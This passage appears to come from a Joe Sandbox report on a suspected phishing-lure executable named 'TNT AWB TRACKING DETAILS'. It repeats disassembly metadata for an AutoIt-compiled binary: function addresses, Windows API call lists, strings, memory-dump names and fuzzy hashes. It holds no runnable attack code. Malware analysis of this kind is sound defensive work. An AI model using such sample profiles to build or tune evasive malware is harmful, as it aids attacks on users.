                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                      Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                      Function 00412216 Relevance: .3, Instructions: 332COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                      Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteObject.GDI32(?), ref: 0045953B
                                      • DeleteObject.GDI32(?), ref: 00459551
                                      • DestroyWindow.USER32(?), ref: 00459563
                                      • GetDesktopWindow.USER32 ref: 00459581
                                      • GetWindowRect.USER32(00000000), ref: 00459588
                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                      • ShowWindow.USER32(?,00000004), ref: 00459865
                                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                      • GetStockObject.GDI32(00000011), ref: 004598CD
                                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                      • DeleteDC.GDI32(00000000), ref: 004598F8
                                      • _wcslen.LIBCMT ref: 00459916
                                      • _wcscpy.LIBCMT ref: 0045993A
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                      • GetDC.USER32(00000000), ref: 004599FC
                                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                                      • String ID: $AutoIt v3$DISPLAY$static
                                      • API String ID: 4040870279-2373415609
                                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                                      Function 004417BF Relevance: 49.8, APIs: 33, Instructions: 275COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000012), ref: 0044181E
                                      • SetTextColor.GDI32(?,?), ref: 00441826
                                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                                      • GetSysColor.USER32(0000000F), ref: 00441849
                                      • SetBkColor.GDI32(?,?), ref: 00441864
                                      • SelectObject.GDI32(?,?), ref: 00441874
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                                      • GetSysColor.USER32(00000010), ref: 004418B2
                                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                                      • DeleteObject.GDI32(?), ref: 004418D5
                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                                      • FillRect.USER32(?,?,?), ref: 00441970
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                                      • String ID:
                                      • API String ID: 69173610-0
                                      • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                                      • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                                      Function 004590BD Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 291windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?), ref: 004590F2
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                      • GetStockObject.GDI32(00000011), ref: 004592AC
                                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                      • DeleteDC.GDI32(00000000), ref: 004592D6
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                      • GetStockObject.GDI32(00000011), ref: 004593D3
                                      • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                      • API String ID: 2910397461-517079104
                                      • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                      • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                      • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                      Function 00403A20 Relevance: 45.7, APIs: 14, Strings: 12, Instructions: 238COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                      • API String ID: 1038674560-3360698832
                                      • Opcode ID: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                      • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                      • Opcode Fuzzy Hash: 23f0f58ea95d18462155f90075fe93dcb11182f556a84baaa607307f542fa917
                                      • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                      Function 00430737 Relevance: 43.6, APIs: 29, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                      • SetCursor.USER32(00000000), ref: 0043075B
                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                      • SetCursor.USER32(00000000), ref: 00430773
                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                      • SetCursor.USER32(00000000), ref: 0043078B
                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                      • SetCursor.USER32(00000000), ref: 004307A3
                                      • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                      • SetCursor.USER32(00000000), ref: 004307BB
                                      • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                      • SetCursor.USER32(00000000), ref: 004307D3
                                      • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                      • SetCursor.USER32(00000000), ref: 004307EB
                                      • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                      • SetCursor.USER32(00000000), ref: 00430803
                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                      • SetCursor.USER32(00000000), ref: 0043081B
                                      • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                      • SetCursor.USER32(00000000), ref: 00430833
                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                      • SetCursor.USER32(00000000), ref: 0043084B
                                      • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                      • SetCursor.USER32(00000000), ref: 00430863
                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                      • SetCursor.USER32(00000000), ref: 0043087B
                                      • SetCursor.USER32(00000000), ref: 00430887
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                      • SetCursor.USER32(00000000), ref: 0043089F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Cursor$Load
                                      • String ID:
                                      • API String ID: 1675784387-0
                                      • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                      • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                      • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                      Function 004308EF Relevance: 42.2, APIs: 28, Instructions: 200windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(0000000E), ref: 00430913
                                      • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                      • GetSysColor.USER32(00000012), ref: 00430933
                                      • SetTextColor.GDI32(?,?), ref: 0043093B
                                      • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                      • GetSysColor.USER32(0000000F), ref: 00430959
                                      • CreateSolidBrush.GDI32(?), ref: 00430962
                                      • GetSysColor.USER32(00000011), ref: 00430979
                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                      • SelectObject.GDI32(?,00000000), ref: 0043099C
                                      • SetBkColor.GDI32(?,?), ref: 004309A6
                                      • SelectObject.GDI32(?,?), ref: 004309B4
                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                      • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                      • DrawFocusRect.USER32(?,?), ref: 00430A91
                                      • GetSysColor.USER32(00000011), ref: 00430A9F
                                      • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                      • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                      • SelectObject.GDI32(?,?), ref: 00430AD0
                                      • DeleteObject.GDI32(00000105), ref: 00430ADC
                                      • SelectObject.GDI32(?,?), ref: 00430AE3
                                      • DeleteObject.GDI32(?), ref: 00430AE9
                                      • SetTextColor.GDI32(?,?), ref: 00430AF0
                                      • SetBkColor.GDI32(?,?), ref: 00430AFB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                      • String ID:
                                      • API String ID: 1582027408-0
                                      • Opcode ID: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                      • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                      • Opcode Fuzzy Hash: 550e896c7567608c30fce12d6ed7134b72d55419159f0474b5285c649df46e98
                                      • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                      Function 0046B9D7 Relevance: 40.7, APIs: 17, Strings: 6, Instructions: 415registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                      • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                      • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: CloseConnectCreateRegistry
                                      • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                      • API String ID: 3217815495-966354055
                                      • Opcode ID: 36a75955d77b631ca06ebe7b7b574e171c88fba640f356bc86dd706e18d111e2
                                      • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                      • Opcode Fuzzy Hash: 36a75955d77b631ca06ebe7b7b574e171c88fba640f356bc86dd706e18d111e2
                                      • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                      Function 004565B2 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 291windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCursorPos.USER32(?), ref: 004566AE
                                      • GetDesktopWindow.USER32 ref: 004566C3
                                      • GetWindowRect.USER32(00000000), ref: 004566CA
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                      • DestroyWindow.USER32(?), ref: 00456746
                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                      • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                      • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                      • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                      • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                      • IsWindowVisible.USER32(?), ref: 0045682C
                                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                      • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                      • GetWindowRect.USER32(?,?), ref: 00456873
                                      • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
